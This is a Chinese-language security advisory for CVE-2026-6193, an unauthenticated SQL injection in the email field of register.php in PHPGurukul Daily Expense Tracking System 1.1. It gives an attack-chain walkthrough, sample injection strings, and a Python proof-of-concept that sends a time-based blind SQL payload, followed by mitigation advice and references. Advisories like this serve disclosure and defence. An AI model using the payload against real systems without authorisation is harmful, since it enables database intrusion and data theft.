CVE-2026-6193 CVSS 7.3 高危

CVE-2026-6193 PHPGurukul费用追踪系统SQL注入漏洞

披露日期: 2026-04-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6193

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

PHPGurukul Daily Expense Tracking System

漏洞概述

PHPGurukul Daily Expense Tracking System 1.1版本存在严重的安全漏洞。该漏洞位于/register.php文件中，由于对用户输入的email参数缺乏过滤，导致攻击者可进行SQL注入攻击。攻击者无需身份认证即可远程利用此漏洞，窃取数据库敏感信息或篡改数据，对系统的机密性、完整性和可用性造成威胁。目前已公开相关利用代码，风险较高。

技术细节

该漏洞属于典型的SQL注入漏洞，根源在于输入验证机制的缺失。在PHPGurukul Daily Expense Tracking System 1.1的注册功能实现中，/register.php文件处理用户注册请求时，直接获取客户端提交的email参数。开发者未对该参数进行严格的类型检查或特殊字符转义，直接将其拼接到SQL查询语句中。攻击者可以利用这一缺陷，在email字段中注入恶意的SQL语法片段（如 ' OR '1'='1）。由于该漏洞位于无需认证的注册接口，攻击者可远程发起攻击，无需任何用户交互。通过盲注或联合查询技术，攻击者能够绕过应用逻辑，从后端数据库中提取敏感信息（如管理员凭证、用户记录），甚至在某些情况下写入WebShell或破坏数据结构，对系统的机密性、完整性和可用性构成实质性威胁。

攻击链分析

STEP 1

1. 侦察

攻击者识别出目标正在运行PHPGurukul Daily Expense Tracking System 1.1，并定位到注册接口/register.php。

STEP 2

2. 武器化

攻击者构造包含恶意SQL语句的Payload，针对email参数进行设计，例如利用基于时间的盲注语句。

STEP 3

3. 投递

攻击者通过HTTP POST请求向/register.php发送包含恶意email参数的数据包。

STEP 4

4. 利用

后端服务器接收请求并将未经过滤的email参数拼接到SQL查询中执行，导致恶意代码运行。

STEP 5

5. 达成目的

攻击者根据响应时间或错误信息获取数据库结构，进而提取敏感数据或绕过认证。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_sqli(url):
    target = f"{url}/register.php"
    # Payload for time-based blind SQL injection
    # Assuming the email parameter is vulnerable
    payload = {
        "username": "poc_test",
        "email": "test' AND SLEEP(5)-- -",
        "password": "password",
        "confirm_password": "password"
    }
    
    try:
        response = requests.post(target, data=payload, timeout=10)
        # Check if response time indicates successful sleep execution
        if response.elapsed.total_seconds() >= 5:
            return True
    except Exception as e:
        print(f"Error: {e}")
    return False

if __name__ == "__main__":
    target_url = "http://target-ip"
    if check_sqli(target_url):
        print("[+] Vulnerable to SQL Injection")
    else:
        print("[-] Not Vulnerable")

影响范围

PHPGurukul Daily Expense Tracking System 1.1

防御指南

临时缓解措施

建议立即在/register.php中对email参数实施正则表达式校验，确保输入符合电子邮件格式且不包含单引号等SQL元字符。同时，部署Web应用防火墙（WAF）规则以拦截常见的SQL注入攻击模式，直至完成代码修复。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6193
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6193
3 Details https://www.cvedetails.com/cve/CVE-2026-6193/
4 VulDB https://vuldb.com/cve/CVE-2026-6193
5 Link https://github.com/f1rstb100d/CVE/issues/47
6 Link https://phpgurukul.com/
7 Link https://vuldb.com/submit/797433
8 Link https://vuldb.com/vuln/357115
9 Link https://vuldb.com/vuln/357115/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表